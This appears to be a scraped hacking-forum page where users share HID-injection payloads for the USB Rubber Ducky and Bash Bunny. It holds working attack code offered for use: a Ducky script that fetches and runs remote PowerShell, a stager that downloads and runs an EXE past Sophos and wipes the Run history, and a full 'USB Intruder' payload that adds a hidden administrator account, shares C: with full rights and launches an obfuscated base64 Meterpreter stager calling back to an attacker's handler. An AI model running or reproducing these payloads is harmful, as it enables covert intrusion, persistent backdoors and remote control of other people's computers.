Search the Community

How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime. Script for website: The code on my website looks something like this... Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" $arr = (Get-Item -Path $path).Property $url = "www.linkToEndPayload" $output = "$env:temp/test.zip"; $out = "$env:temp/Remake.txt"; Remove-Item -Path $output Invoke-WebRequest -Uri $url -OutFile $output Unzip $output "$env:temp/" Rename-Item -Path $out -NewName "Remake.exe" Start-Process -FilePath "$env:temp/Remake.exe" foreach($item in $arr) { if($item -ne "MRUList") { Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue } } This code downloads the .EXE payload (Which is stored in a .ZIP file.) We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates. Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this... Script for ducky: DELAY 500 GUI r DELAY 100 STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a ENTER That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection. PS: I'm not very good at PowerShell Scripting

I've updated my psh_DownloadExecSMB payload to allow for exfiltration. psh_DownloadExecSMB will take any powershell payload, execute it and alert via green LED when it's completed. All file transfers happens over SMB to the Bash Bunny. In order to exfil data, have your powershell payload upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot. Bonus: Because this payload uses SMB, any captured SMB credentials will be stored as loot. My Repo: https://github.com/hink/bashbunny-payloads/tree/payload/pshExecFixes/payloads/library/execution/psh_DownloadExecSMB Pull Request: https://github.com/hak5/bashbunny-payloads/pull/268

Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So.. why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has done executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo: Write file (with content) to the desktop Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible Open calculator application Message box -- powered by PowerShell For information about the payload, the payload script itself and how to configure it, it can be found at this GitHub repository: https://github.com/uintdev/RevShellBack

Posting for discussion and feedback. I will be submitting this for approval into the repository in the near future. I have attached a zip containing all necessary files as well for those of you that want to pick it up and run with it. Read the README below and in the zip first, and post any comments or questions you may have. -B0rk README.MD # USB Intruder for BashBunny and TwinDucky - Title: USB Intruder - Author: B0rk - Version: 1.0 - Target: Windows XP SP3+ - Props: Hak5Darren, Diggster, IMcPwn - Category: Infiltration/Execution ## Description Infiltrates a target system and performs the following: Creates a new user with the following credentials - pwnie:dungothacked Shares the root of the C: drive with full permissions to the new user pwnie with the label HACKED$ (Hidden) Created a hidden ProgData folder in the %UserProfile% Sets powershell execution to unrestricted Copies files from the USB_Intruder directory on the BashBunny to the hidden ProgData folder in the user profile Executes the eject.ps1 file that properly ejects the Mass Storage portion of the payload Executes a shell.bat file that is in fact a Meterpreter script calling back to the Attacker's Handler (not going into detail on how to do that) Cleans up the Run dialogue history **undo.bat is provided to reverse the first 3 actions above (in case you want to test)** **Be sure to have your handler ready to accept the incoming connection from the victim** ## Configuration Replace the shell.bat file in the USB_Intruder folder with your own custom Meterpreter script or what ever bat file you would like. **You will need to change delays accordingly to the profile of the victim's PC hardware.** ## STATUS | LED | Status | | --------------- | ---------------- | | Solid White | Initialization | | Blue Flashing | HID Phase 1 | | Solid Magenta | HID Phase 2 | | Red Flashing | Ejecting Storage | | Solid Cyan | HID Phase 3 | | Yellow Flashing | Cleanup of Run | | Green Flashing | Sync/EOF | | Solid Green | 100% Complete | payload.txt #!/bin/bash # #TITLE: USB Intruder #AUTHOR: B0rk #VERSION: 1.0 #PROPS: Hak5Darren, Diggster, IMcPwn #OS: Windows (Requires Powershell and Admin Rights) #ATTACKMODE: HID STORAGE # #DESCRIPTION: Opens up attack vectors and a meterpreter powershell script on a Victim PC. **Based on usb_exfiltrator by DK & Friends** # #LED INDICATORS: #White - Initialization #Blue Blinking - phase 1 #Magenta - phase 2 #Cyan - phase 3 #Yellow Blinking - Cleanup #Green - Attack Completion #Initialization - Setting AttackModes LED W ATTACKMODE HID STORAGE #Initialization Completed #Beginning of phase 1 LED B 10 #Sharing C Drive as HACKED$ and adding user pwnie with password of dungothacked to local Administrators group. #Also creates a new (hidden) folder in the current user's profile to drop files into for execution later on. Q DELAY 2000 Q GUI d Q DELAY 100 Q GUI r Q DELAY 500 Q STRING powershell -Command "Start-Process cmd -Verb RunAs" Q ENTER Q DELAY 800 Q ALT y Q DELAY 500 Q STRING net user pwnie dungothacked /add Q ENTER Q STRING net localgroup Administrators pwnie /add Q ENTER Q STRING net share HACKED$=C:\ /grant:pwnie,FULL Q ENTER Q STRING mkdir %UserProfile%\\ProgData Q ENTER Q STRING attrib +h %UserProfile%\\ProgData Q ENTER Q STRING powershell Q ENTER Q DELAY 500 Q STRING Set-ExecutionPolicy Unrestricted Q ENTER Q STRING exit Q ENTER Q STRING exit Q ENTER Q DELAY 500 #End of phase 1 #Beginning of phase 2 LED M #Copying Files from BashBunny to %UserProfile%\ProgData Q GUI r Q DELAY 500 Q STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" Q ENTER Q DELAY 2000 #End of phase 2 #Ejection of Mass Storage LED R 0 Q GUI d Q DELAY 250 Q GUI r Q DELAY 500 Q STRING powershell -Command "Start-Process cmd -Verb RunAs" Q ENTER Q DELAY 800 Q ALT y Q DELAY 800 Q STRING powershell Q ENTER Q DELAY 500 Q STRING cd \$Env:UserProfile\\ProgData Q ENTER Q STRING .\\eject.ps1 Q ENTER Q STRING exit Q ENTER Q STRING exit Q ENTER Q DELAY 500 #End of Ejection #Beginning of phase 3 LED C #Running PS script for Remote Shell from %UserProfile%\ProgData Directory. Q GUI r Q DELAY 500 Q STRING powershell -Command "Start-Process cmd -Verb RunAs" Q ENTER Q DELAY 800 Q ALT y Q DELAY 800 Q STRING powershell -windowstyle hidden \%userprofile%\\ProgData\\shell.bat Q ENTER Q DELAY 200 #End of phase 3 #Cleanup LED Y 100 #Clears complete run history Q GUI r Q DELAY 500 Q STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue Q ENTER #End of Cleanup #Completion of script LED G 100 sync LED G #Completed d.cmd @echo OFF REM Setting dst to %BASHBUNNY%\Payload\$Switch_Position\USB_Intruder\ set dst=%~dp0USB_Intruder REM Copying files from dst to %USERPROFILE%\ProgData xcopy /C /Q /G /Y /S %dst%\*.* %USERPROFILE%\ProgData\ @cls @exit undo.bat (for undoing the first 3 actions of the payload **For Testing Purposes/Not Required**) net user pwnie /delete net share HACKED$ /delete RD /S /Q %UserProfile%\ProgData Inside the USB_Intruder folder: eject.ps1 $BB = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BASHBUNNY' } | Select-Object -First 1 -ExpandProperty Driveletter $driveEject = New-Object -comObject Shell.Application $driveEject.Namespace(17).ParseName("$BB").InvokeVerb("Eject") shell.bat (should be replaced with your own meterpreter script) @echo off if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") USB_Intruder.zip